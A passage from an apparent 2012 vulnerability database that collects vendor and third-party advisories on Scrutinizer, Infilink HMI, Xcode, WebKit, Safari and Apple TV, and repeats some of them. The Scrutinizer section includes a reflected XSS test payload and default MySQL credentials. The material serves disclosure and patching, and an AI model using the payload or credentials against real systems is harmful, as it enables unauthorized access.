Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer
package. The installation of these packages are transparent to the user
during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which
are not configured by the user which could be easily guessed by an
attacker. There is currently no way to change these values within the
Scrutinizer application and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative
passwords:
#Request
select User,Password from mysql.user;
#Response
User |Password
root |
root |
scrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'
users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the
equivalent of every network interface on the system allowing users with the
proper access rights to interact directly with the MySQL instance.
Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.
Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
References
1. http://www.plixer.com
2. http://blog.spiderlabs.com
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
| VAR-201207-0679 | No CVE | Kessler Ellis Products Infilink HMI Unauthorized Access Vulnerability |
CVSS V2: - CVSS V3: - Severity: MEDIUM |
Kessler-Ellis is a well-known instrument manufacturer. The Infilink HMI is the Human Machine Interface (HMI) for Kessler-Ellis products. The Kessler Ellis Products Infilink HMI product failed to securely hash the authentication credentials in the project file. This product uses a simple binary XOR process to encrypt the plaintext password, allowing the attacker to simply extract the password information and control the application. Kessler-Ellis Products Infilink-HMI is prone to an unauthorized-access vulnerability.
Local attackers can exploit this issue to gain unauthorized access to the affected application. This may aid in further attacks.
Infilink-HMI 5.00.23 is vulnerable. Infilink HMI Yes Kessler-Ellis HMI of the product (HMI)
| VAR-201207-0093 | CVE-2012-3698 | Apple Xcode Vulnerable to reading keychain entries |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Apple Xcode before 4.4 does not properly compose a designated requirement (DR) during signing of programs that lack bundle identifiers, which allows remote attackers to read keychain entries via a crafted app, as demonstrated by the keychain entries of a (1) helper tool or (2) command-line tool. Apple Xcode Specifies the requirements specified when signing programs that do not have a bundle identifier. (DR) Vulnerabilities exist that allow keychain entries to be read because of improperly configured.A third party may be able to read the keychain entry through a crafted application. Apple Xcode is prone to an information-disclosure vulnerability.
Attackers can leverage this issue to gain access to sensitive information. Information obtained may aid in further attacks. For example keychain entries for (1) accessibility tools or (2) command line tools. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-07-25-2 Xcode 4.4
Xcode 4.4 is now available and addresses the following:
neon
Available for: OS X Lion v10.7.4 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
The neon library (used by Subversion) disabled the 'empty fragment'
countermeasure which prevented these attacks. This issue is addressed
by enabling the countermeasure. When a Developer ID was used
with Xcode to sign a product that did not have a bundle identifier,
such as a command-line tool or an embedded helper, the generated DR
for the product did not include the developer's ID in the part of the
DR that applies to apps signed by the App Store. As a result, any App
Store app may have accessed keychain items created by the product.
This is addressed by generating a DR with improved checks. Affected
products need to be re-signed with this version of Xcode to include
the improved DR.
CVE-ID
CVE-2012-3698
Xcode 4.4 may be obtained from the Downloads section of the
Apple Developer Connection Member site: http://developer.apple.com/
Login is required, and membership is free.
Xcode 4.4 is also available from the App Store. It is free to anyone
with OS X 10.7.x Lion and later.
The download file is named: "xcode446938108a.dmg"
Its SHA-1 digest is: d04393543564f85c2f4d82e507d596d3070e9aba
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.18 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJQDy5fAAoJEPefwLHPlZEwWasP/iuE4F9PkoV01YyZlBeoQ/qE
zn62KshgNUkVq0TPe/leKG0UXWxYsPQQy1+KC9o7ULnGZWrQLexO7ZySz3eImbIW
VdPXslMzEbk3YiRi/syeo16IwZheMqatKTS47NTG5xREg17vos889xbqxML4ijNN
4IysAFqewbG1qdvu35RkO4uhxO/+6pLiXjkQx/z21ml8S3ZZNnPxCE/9sGWqIJ7R
pO/9+hIecX05wtSUCkqfARZxObSDs0VTQZUak+8fKAF8k5aNY8GdnMrxNBCX9vkU
hHgLTQ4lXaqSv2UEhbkjaZuLHHNFkNINf1pbABDWASiATP0wSLVFYM3KabMqid8I
WS4b3aplqi5GqOHqRWOTtbSTsPJC73DF1PrHlvPZm7WYQmIrF6DPIlmIfK058Fqp
QRpz3H1cZwFf2B/oS4VGwtqjj606lRn7En3psMRlCyKSTdUYPd5dzCIyg8CNlpuy
9AAKEU6fhY2JCEm+2LtqdBZI+WvCET50hD9ZEzkq/2m/sazASJ5W9VtH1JzFHm9N
RvE4NS6k/u6BLU2zsUiqJ/cyVGMV7RF3gIEi+NXAShFNHfavDPgoTN2MPkeT3V0C
sa6X/O3dn4F9PFJZvqKyHKeBRI0lV3PSgKP/xC/K+cD/YraFFFvUn7XoVZ2A8uPW
bYcdpG4AJaNdEGZY71xq
=OWIG
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Apple Xcode Two Vulnerabilities
SECUNIA ADVISORY ID:
SA50068
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50068/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50068
RELEASE DATE:
2012-07-26
DISCUSS ADVISORY:
http://secunia.com/advisories/50068/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50068/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50068
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A weakness and a vulnerability have been reported in Apple Xcode,
which can be exploited by malicious people to disclose potentially
sensitive information, hijack a user's session, and bypass certain
security restrictions.
1) A design error exists within the implementation of SSL 3.0 and TLS
1.0 protocols.
The weakness and the vulnerability are reported in versions prior to
4.4.
SOLUTION:
Update to version 4.4 via the Apple Developer site or via the App
Store.
PROVIDED AND/OR DISCOVERED BY:
2) Reported by the vendor.
ORIGINAL ADVISORY:
APPLE-SA-2012-07-25-2:
http://support.apple.com/kb/HT5416
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201209-0256 | CVE-2012-3598 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. ============================================================================
Ubuntu Security Notice USN-1617-1
October 25, 2012
webkit vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
Summary:
Multiple security vulnerabilities were fixed in WebKit.
Software Description:
- webkit: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKit browser and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
libjavascriptcoregtk-1.0-0 1.8.3-0ubuntu0.12.04.1
libjavascriptcoregtk-3.0-0 1.8.3-0ubuntu0.12.04.1
libwebkitgtk-1.0-0 1.8.3-0ubuntu0.12.04.1
libwebkitgtk-3.0-0 1.8.3-0ubuntu0.12.04.1
After a standard system update you need to restart your session to make all
the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-09-19-3 Safari 6.0.1
Safari 6.0.1 is now available and addresses the following:
Safari
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: Opening a maliciously crafted downloaded HTML document may
lead to the disclosure of local file content
Description: In OS X Mountain Lion HTML files were removed from the
unsafe type list. Quarantined HTML documents are opened in a safe
mode that prevents accessing other local or remote resources. A logic
error in Safari's handling of the Quarantine attribute caused the
safe mode not to be triggered on Quarantined files. This issue was
addressed by properly detecting the existence of the Quarantine
attribute.
CVE-ID
CVE-2012-3713 : Aaron Sigel of vtty.com, Masahiro Yamada
Safari
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: Using Autofill on a maliciously crafted website may lead to
the disclosure of contact information
Description: A rare condition existed in the handling of Form
Autofill. Using Form Autofill on a maliciously crafted website may
have led to disclosure of information from the Address Book "Me" card
that was not included in the Autofill popover. This issue was
addressed by limiting Autofill to the fields contained in the
popover.
CVE-ID
CVE-2012-3714 : Jonathan Hogervorst of Buzzera
Safari
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: After editing a HTTPS URL in the address bar, a request may
be unexpectedly sent over HTTP
Description: A logic issue existed in the handling of HTTPS URLs in
the address bar. If a portion of the address was edited by pasting
text, the request may be unexpectedly sent over HTTP. This issue was
addressed by improved handling of HTTPS URLs.
CVE-ID
CVE-2012-3715 : Aaron Rhoads of East Watch Services LLC, Pepi
Zawodsky
WebKit
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2011-3105 : miaubiz
CVE-2012-2817 : miaubiz
CVE-2012-2818 : miaubiz
CVE-2012-2829 : miaubiz
CVE-2012-2831 : miaubiz
CVE-2012-2842 : miaubiz
CVE-2012-2843 : miaubiz
CVE-2012-3598 : Apple Product Security
CVE-2012-3601 : Martin Barbella of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3602 : miaubiz
CVE-2012-3606 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3607 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3612 : Skylined of the Google Chrome Security Team
CVE-2012-3613 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3614 : Yong Li of Research In Motion, Inc.
CVE-2012-3616 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3617 : Apple Product Security
CVE-2012-3621 : Skylined of the Google Chrome Security Team
CVE-2012-3622 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3623 : Skylined of the Google Chrome Security Team
CVE-2012-3624 : Skylined of the Google Chrome Security Team
CVE-2012-3632 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3643 : Skylined of the Google Chrome Security Team
CVE-2012-3647 : Skylined of the Google Chrome Security Team
CVE-2012-3648 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3649 : Dominic Cooney of Google and Martin Barbella of the
Google Chrome Security Team
CVE-2012-3651 : Abhishek Arya and Martin Barbella of the Google
Chrome Security Team
CVE-2012-3652 : Martin Barbella of Google Chrome Security Team
CVE-2012-3654 : Skylined of the Google Chrome Security Team
CVE-2012-3657 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3658 : Apple
CVE-2012-3659 : Mario Gomes of netfuzzer.blogspot.com, Abhishek Arya
(Inferno) of the Google Chrome Security Team
CVE-2012-3660 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3671 : Skylined and Martin Barbella of the Google Chrome
Security Team
CVE-2012-3672 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3673 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3675 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3676 : Julien Chaffraix of the Chromium development
community
CVE-2012-3677 : Apple
CVE-2012-3684 : kuzzcc
CVE-2012-3685 : Apple Product Security
CVE-2012-3687 : kuzzcc
CVE-2012-3688 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3692 : Skylined of the Google Chrome Security Team, Apple
Product Security
CVE-2012-3699 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3700 : Apple Product Security
CVE-2012-3701 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3702 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3703 : Apple Product Security
CVE-2012-3704 : Skylined of the Google Chrome Security Team
CVE-2012-3705 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3706 : Apple Product Security
CVE-2012-3707 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3708 : Apple
CVE-2012-3709 : Apple Product Security
CVE-2012-3710 : James Robinson of Google
CVE-2012-3711 : Skylined of the Google Chrome Security Team
CVE-2012-3712 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
For OS X Lion systems Safari 6.0.1 is available via the Apple
Software Update application.
For OS X Mountain Lion systems, Safari 6.0.1 is included with
OS X v10.8.2.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJQWho/AAoJEPefwLHPlZEwG9kP/A2FKYpkYoEnaHSaCeI8W/Gt
F+EjtnJ85SnVz76a81dt7O+F65pYMjMYEEHthgw62JAbZHrw93gf1dWpp+0IfXJZ
w/dOV6yNxYmDOh0zir1I2tCIplkD2MvUrubcW+UCwDbVxnGKsTNBWzovHpvos2Uk
lRn6Bl1wM5vOthJO14Z6iS0XX4GkefA3XzoVqY6dU0c9mxrTQhtMWvL+Pb1UpqX3
CZLcMmFGRuCE/+aM+d1x749PEteNDbrnw/aYfMyMSUNgb43EaUxCzTiUU+NvzsFL
Ah33i29Li38nl+rLVgTRRU9EQVm1ZcujoftpgFw9prTd999f47eCSU5/QeDjY+Zw
GLJRDfe/PP/GFKzAchefqS5x2PFUI9hZRGJEFviOEygfEPfYVCe/r/iMvBTtwfkn
GVw1WIXcraqxXGzUNhCCZy3rcA8sSbJlCaIIr3VbtPS7PMHwjSaT+DBgD0hWtnk2
uATTye1UKG8m+FfwXn7ha3/W0kmdEGn1dBgpG2d35yXkGj7zgUgi4MX9HTVGTqEd
Nvlzpffv5LCCdDqhRgqe4uT7fKmb46owoNNHM4eAH4A4EwHzA3lXQt5twhO9b2gL
gWZ+bfwxfUaVlyBDPM1cUZ4e13HRiFPiRI9PJ2S5DrLoiMzpXIbBRH+5fs9uVvV+
zhJ+1dokzSpzRKJOq68N
=xYhU
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Apple iTunes Multiple WebKit Vulnerabilities
SECUNIA ADVISORY ID:
SA50618
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50618/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50618
RELEASE DATE:
2012-09-13
DISCUSS ADVISORY:
http://secunia.com/advisories/50618/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50618/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50618
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Apple iTunes, which
can be exploited by malicious people to compromise a user's system. No
further information is currently available.
For more information
SA47231
SA47694
SA47938
SA48016
SA48265
SA48274
SA48512
SA48618
SA48732
SA48992
SA49194
SA49277
SA49724
SA49906
SA50058
The vulnerabilities are reported in versions prior to 10.7.
SOLUTION:
Update to version 10.7.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
ORIGINAL ADVISORY:
APPLE-SA-2012-09-12-1:
http://lists.apple.com/archives/security-announce/2012/Sep/msg00001.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0490 | CVE-2012-0683 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-09-24-1 Apple TV 5.1
Apple TV 5.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access existed in the handling
of Sorenson encoded movie files. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2012-3722 : Will Dormann of the CERT/CC
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may broadcast
MAC addresses of previously accessed networks per the DNAv4
protocol. This issue was addressed by disabling DNAv4 on unencrypted
Wi-Fi networks
CVE-ID
CVE-2012-3725 : Mark Wuergler of Immunity, Inc.
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of
ThunderScan encoded TIFF images. This issue was addressed by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libpng's
handling of PNG images. These issues were addressed through improved
validation of PNG images.
CVE-ID
CVE-2011-3026 : Juri Aedla
CVE-2011-3048
CVE-2011-3328
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG image may lead to an
unexpected application termination or arbitrary code execution
Description: A double free issue existed in ImageIO's handling of
JPEG images. This issue was addressed through improved memory
management.
CVE-ID
CVE-2012-3726 : Phil of PKJE Consulting
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow issue existed in libTIFF's handling
of TIFF images. This issue was addressed through improved validation
of TIFF images. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-1173
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Applications that use ICU may be vulnerable to an unexpected
application termination or arbitrary code execution
Description: A stack buffer overflow existed in the handling of ICU
locale IDs. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2011-4599
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple vulnerabilities existed in libxml, the most
serious of which may lead to an unexpected application termination or
arbitrary code execution. These issues were addressed by applying the
relevant upstream patches.
CVE-ID
CVE-2011-1944 : Chris Evans of Google Chrome Security Team
CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-3919 : Juri Aedla
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in
JavaScriptCore. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2012-0682 : Apple Product Security
CVE-2012-0683 : Dave Mandelin of Mozilla
CVE-2012-3589 : Dave Mandelin of Mozilla
CVE-2012-3590 : Apple Product Security
CVE-2012-3591 : Apple Product Security
CVE-2012-3592 : Apple Product Security
CVE-2012-3678 : Apple Product Security
CVE-2012-3679 : Chris Leary of Mozilla
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJQXO50AAoJEPefwLHPlZEwc40P/AmBKys+PAsdT8gGrSpOY1B9
8h+Y0xdE+Hmesq9D4p6wvdY/lR+zMqtSwT6amNImYCIaRmm1P8+r8n31be52TYlg
7GqEAZbDtFztHwIISC8Khf8dMvWSrLhzRa7X/cxlIgRKmoXFnqJZzYcUov/M9Uw8
KwejQnztmAx7srHnZCNI+dxFqAC7hPoegnDnlVPx1DkwKDjt8q9xD3PGQyiGWWkI
wqUEWvMGWr65CFyA7R0hDqKuNCowWn2cKP1UhIoEur5yRmc4aQVtOnHhJ8k9mdoO
+58JC/y8lCtqGUyEL2Ar0FmIcRX/GJf+/isKOtmHx0JuEhH5beQ6s9FxU5eNR9DH
EVPmVXowY9wMvKxwHFU3jwq8kQ3+IYC+7KA6lScb5mXO5mC5dbJPLp7uJto7+VtI
atgQmvzdB8G562wpwTPuA4UQWWr0i6WWl8zkfgkRHO+cXyN683rkBP/vVEo9FipR
YkQ10RsXqYDRXBcRywmTZZwQy6txMtV9D2bnk1uukQHBsZh30/mEpcmZbo6CO3s3
mnOtu5D2OQsNt4MqbviUkEgdc9JIJnqAOo+9YguDCEu6Rd7unbKB3RpmD+A3OJnR
GhEa2Gqyvm/ozfb2D4L01y4UQo7dMLw+t/FOZXkrpdLlWn2LANWvXDCPSzIFCKoN
cXF+ij425pfY+d7Iekz3
=PSL+
-----END PGP SIGNATURE-----
| VAR-201207-0489 | CVE-2012-0682 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-09-24-1 Apple TV 5.1
Apple TV 5.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access existed in the handling
of Sorenson encoded movie files. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2012-3722 : Will Dormann of the CERT/CC
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may broadcast
MAC addresses of previously accessed networks per the DNAv4
